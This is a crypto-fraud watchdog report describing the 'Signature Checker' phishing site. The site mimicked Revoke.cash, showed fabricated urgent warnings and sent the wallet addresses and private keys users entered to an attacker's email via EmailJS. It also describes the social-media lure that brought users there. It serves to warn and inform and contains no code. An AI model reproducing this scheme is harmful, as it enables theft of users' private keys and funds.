QUADRIGA INITIATIVE
CRYPTO WATCHDOG & FRAUD RECOVERY PLATFORM
A COMMUNITY-BASED, NOT-FOR-PROFIT
UNKNOWN
MAY 2025
GLOBAL
SIGNATURE CHECKER
DESCRIPTION OF EVENTS
Most users first come across the Signature Checker website through social media, especially on platforms like X (formerly Twitter). Typically, they might notice a reply or direct message from someone who appears knowledgeable about blockchain security. This person may respond to a user’s post about a recent transaction or general crypto discussion, pointing out that their wallet might have a risky authorization and recommending they check it using a tool like Signature Checker.
The message often feels helpful and urgent, with the person claiming they noticed something unusual or that the user may have unknowingly signed a harmful transaction. They might even include a tutorial link or step-by-step instructions to “fix” the issue using the suggested tool. This kind of outreach can feel like timely assistance from a concerned member of the crypto community.
When users follow the link, they’re taken directly to the Signature Checker homepage. Users are greeted with a clean and professional-looking interface that appears similar to other popular blockchain tools. The homepage prominently features a search bar inviting users to input their wallet address to "check for risky authorizations" or security issues related to their wallet. For users concerned about the safety of their crypto assets, this seems like a helpful and timely service.
The site claims to scan a user’s wallet for any potentially dangerous or outdated token approvals—permissions that may allow external applications to move tokens on behalf of the user. After entering a wallet address, the tool quickly generates a report highlighting any "risky approvals," along with timestamps and specific contract details, giving users the impression that it's actively monitoring blockchain activity in real time.
The design mimics the familiar aesthetics of trusted blockchain utilities, with a dark-themed layout, simple icons, and technical terms displayed in a way that feels authoritative. For added convenience, there’s even an option to “resolve” or “revoke” the identified risks, and users are guided through the process step-by-step. The site appears to be a useful resource for anyone looking to improve their wallet security or stay informed about potential threats in their transaction history.
The Signature Checker website, hosted at signature[.]land, is a sophisticated phishing platform designed to deceive cryptocurrency users into surrendering their private keys under the guise of a security tool. Its user interface is intentionally crafted to closely resemble the legitimate Revoke.cash site, a well-known tool used to manage token approvals and permissions on blockchain wallets. This visual mimicry plays a crucial role in lowering the user’s guard, creating a false sense of legitimacy and security.
Upon visiting the site, users are presented with warnings claiming their wallet has a “risky authorization” and are prompted to input their wallet address or, more dangerously, their private key to check for potential threats. The site is engineered to fabricate results: no matter what address is entered, it consistently displays an urgent warning about supposed suspicious approvals, with timestamps designed to appear recent. This strategy creates a false sense of urgency, pressuring users to act immediately in hopes of "revoking" harmful permissions.
However, the tool’s underlying functionality is purely malicious. SlowMist’s analysis of the site’s front-end code revealed that it uses EmailJS, an email-sending service, to transmit all user input—whether addresses or private keys—directly to the attacker’s email inbox: abpulimali@gmail[.]com. The site also uses the Etherscan API to validate wallet addresses, adding another layer of apparent legitimacy.
In reality, the Signature Checker site is a textbook example of a social engineering scam dressed in technical credibility. It leverages fear, impersonation, and familiarity to exploit users, particularly those less experienced with Web3 security practices. The site is actively flagged as malicious by security services like Scam Sniffer and is part of a broader campaign run by a scammer impersonating crypto security figures and engaging users via social media platforms.
The scam relies on proximity to the trusted revoke.cash link, a frontend design to instill trust, scripted logic to fabricate warnings, and backend email APIs to exfiltrate data—all wrapped in social engineering that exploits the user’s fear and desire to secure their assets quickly.
The scheme behind the Signature Checker phishing site operates through a combination of frontend deception, social engineering, and backend data harvesting. At its core, the site is designed to mimic the appearance and behavior of legitimate wallet authorization management tools like Revoke.cash. It presents users with a sleek interface that accepts wallet addresses and claims to scan for "risky authorizations" or approvals. However, these results are entirely fabricated—regardless of the input, the site displays alarming warnings suggesting the wallet is compromised, often including a timestamp close to the time of the check to create a false sense of urgency.
The site is built to capture sensitive user input. The most critical element is the prompt asking users to paste in their address or private key under the pretense of checking for risky approvals. If the user inputs a private key the site uses EmailJS, a JavaScript-based email API, to immediately transmit that data to the scammer’s email address (abpulimali@gmail[.]com). This data exfiltration happens silently in the background, without the user's knowledge. Even if the input is invalid or causes an error on-screen, the information is still sent.
If the user enters a valid wallet address, the site calls the Etherscan API to verify that any submitted wallet address is valid and exists on-chain. The user is presented with a polished UI and real-time error feedback, which indicates that they are interacting with a genuine security platform and at risk. Attempting to revoke the malicious signature is suspected to request wallet permissions.
It is unknown how many users have lost funds through this method.
SlowMist posted a guideline online about the incident and sent out a tweet to warn others.
The domain appears to be taken down for the moment.
This type of scheme will likely return.
Many users first encounter the Signature Checker website through seemingly helpful messages on social media, where someone posing as a security expert warns them about a risky wallet authorization and suggests checking it using the tool. The site itself looks polished and legitimate, mimicking trusted platforms like Revoke.cash and claiming to detect dangerous token approvals. Once users enter a wallet address or private key, the tool fabricates warnings to create urgency, pushing them to take immediate action. Behind the scenes, any data entered—especially private keys—is silently sent to the attacker via an email API. Though the site has been taken down, the scheme highlights how social engineering, urgency, and fake security tools can be weaponized to exploit crypto users, and it will likely reappear in some form.
SlowMist - "We recently assisted a user who encountered a suspicious tool claiming his wallet had a “risky authorization.” The tool prompted him to paste his private key to resolve the issue." - Twitter/X (Jun 2)
Behind the Mask: SlowMist Reveals How a Fake Security Expert Tricked Crypto Users - SlowMist Medium (Jun 2)
Spotting the Difference: Identifying Genuine and Fake Twitter Accounts - SlowMist Medium (Jun 2)
https://x.com/SlowMist_Team/status/1929456115173257558 (Jun 10)
